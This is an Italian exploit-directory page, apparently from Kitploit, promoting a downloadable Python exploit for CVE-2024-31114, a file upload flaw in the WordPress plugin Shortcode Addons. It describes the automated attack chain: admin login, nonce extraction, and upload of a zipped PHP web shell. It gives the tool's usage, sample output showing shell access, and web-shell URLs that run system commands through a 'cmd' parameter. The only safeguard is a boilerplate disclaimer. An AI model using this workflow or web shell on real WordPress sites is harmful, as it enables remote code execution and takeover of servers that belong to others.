Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Autenticato (Admin+) Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-31114
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Autenticato (Admin+) Caricamento Arbitrario di File

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-31114 - Exploit RCE per Shortcode Addons di WordPress

Shortcode Addons <= 3.2.5 – Upload arbitrario di file autenticato (Admin+)
ID CVE: CVE-2024-31114
Punteggio CVSS: 9.1 (Critico)


🛠️ Descrizione della vulnerabilità

Il plugin Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancata validazione del tipo di file in tutte le versioni fino alla 3.2.5 inclusa.

Questa falla consente a attaccanti autenticati con accesso di livello amministratore o superiore di caricare file arbitrari sul server — il che può portare a Esecuzione di Codice Remota (RCE).


🚀 Descrizione dello script

Questo script Python automatizza lo sfruttamento della vulnerabilità. Esegue:

  1. Disabilitazione della verifica SSL
  2. Accesso con le credenziali fornite
  3. Estrazione del token CSRF (_wpnonce)
  4. Generazione di una shell PHP (nxploit.php)
  5. Compressione e caricamento come
.zip
  • Conferma del caricamento e accesso alla shell
  • Esecuzione di whoami sul server target

  • 🧪 Utilizzo

    root@kitploit:~
    usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
    
    Shortcode Addons <= 3.2.5 - Upload arbitrario di file autenticato (Admin+)
    Di: Nxploited | Khaled Alenazi
    
    opzioni:
      -h, --help            Mostra questo messaggio di aiuto ed esci
      -u, --url URL         URL del target (es. http://target.com)
      -un, --username USERNAME   Nome utente amministratore WordPress
      -p, --password PASSWORD    Password amministratore WordPress
    

    📤 Esempio di output

    root@kitploit:~
    [+] Autenticazione riuscita.
    [+] _wpnonce estratto: 9d8dbbc630
    [+] Payload nxploit.zip creato.
    [+] Payload caricato.
    [+] Shell accessibile all'indirizzo: http://target/wp-content/uploads/shortcode-addons/nxploit.php
    [+] Output del comando:
    ------------------
    www-data
    ------------------
    [+] File temporanei rimossi.
    

    🐚 Utilizzo della Web Shell

    Una volta caricato il payload, puoi eseguire comandi di sistema usando il seguente formato:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=comando
    

    🔹 Esempio:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
    

    Questo elencherà il contenuto della directory corrente sul server.

    ⚠️ Disclaimer

    Questo strumento è solo per scopi educativi e di test autorizzati.
    L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.

    Usalo responsabilmente e solo su sistemi per i quali hai esplicita autorizzazione al test.


    Di: Nxploited | Khaled Alenazi

    Scarica lo strumento